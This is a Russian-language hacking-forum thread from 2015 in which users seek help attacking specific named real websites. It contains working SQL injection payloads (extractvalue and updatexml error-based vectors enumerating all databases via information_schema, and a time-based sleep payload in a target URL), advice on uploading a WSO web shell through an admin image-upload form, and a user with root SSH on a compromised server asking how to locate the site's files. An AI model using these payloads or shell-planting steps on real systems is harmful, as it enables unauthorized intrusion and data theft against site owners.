09.10.2015, 12:21
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от AlexG
↑
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Код:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
Вектор объединения значений для extractvalue:
https://rdot.org/forum/showthread.php?t=2860
Код:
extractvalue(1, concat(0x3A, mid((X), Y, 31)))
X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata
Где Y = 1 + I * 31, i = 0, 1, ...
Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок.
Сообщение от Valer4ik
↑
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'
query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
...
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?
Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.
|
|
|
09.10.2015, 17:59
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
Провел на форуме:
36068
Репутация:
0
|
|
Код:
http://watercorpimagelibrary.com.au
Какой шелл сюда лить? В админке заливка изображений |
|
|
|
09.10.2015, 18:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
|
|
|
|
09.10.2015, 20:08
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от qaz
↑
а есть варианты? лей wso
варианты есть. если там java, то на wso2.php ему будет плевать.
Сообщение от vikler
↑
Код:
http://watercorpimagelibrary.com.au
Какой шелл сюда лить? В админке заливка изображений
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.
|
|
|
|
10.10.2015, 01:35
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от yarbabin
↑
варианты есть. если там java, то на wso2.php ему будет плевать.
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.
на оваспе - это где?
|
|
|
|
10.10.2015, 03:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от XAMEHA
↑
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:
Код:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
https://rdot.org/forum/showthread.php?t=60&page=3
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'
Смело считайте, что там ничего нет. Эти
инъекции
стабильно появляются у нас в теме раз в неделю.
То есть
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM ru_video WHERE dateQ №1064[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]You have an error in your SQL syntax[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]check the manual that corresponds to your MySQL server version[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]the right syntax to[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]near[/COLOR][COLOR="#DD0000"]'-20,20'[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR]
можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит
|
|
|
|
10.10.2015, 12:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от BabaDook
↑
То есть
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM ru_video WHERE dateQ №1064[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]You have an error in your SQL syntax[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]check the manual that corresponds to your MySQL server version[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]the right syntax to[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]near[/COLOR][COLOR="#DD0000"]'-20,20'[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR]
можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит
пару страниц назад XAMEHA писал по этому поводу. ничего не получится
|
|
|
|
10.10.2015, 19:29
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от yarbabin
↑
пару страниц назад XAMEHA писал по этому поводу. ничего не получится
Спасибо, так и думал
|
|
|
|
10.10.2015, 23:47
|
|
Новичок
Регистрация: 04.06.2015
Сообщений: 22
Провел на форуме:
7285
Репутация:
0
|
|
хелп.
сканер нашёл blind sql. Что делать с url такого типа?
если менять значения sleep, то ответ изменяется в соответствии со значениями. sleep(6)=6 сек.
Код:
_ttp://megakeys.ru/news/if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
куда копать в таком случае? |
|
|
|
11.10.2015, 08:59
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация: http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
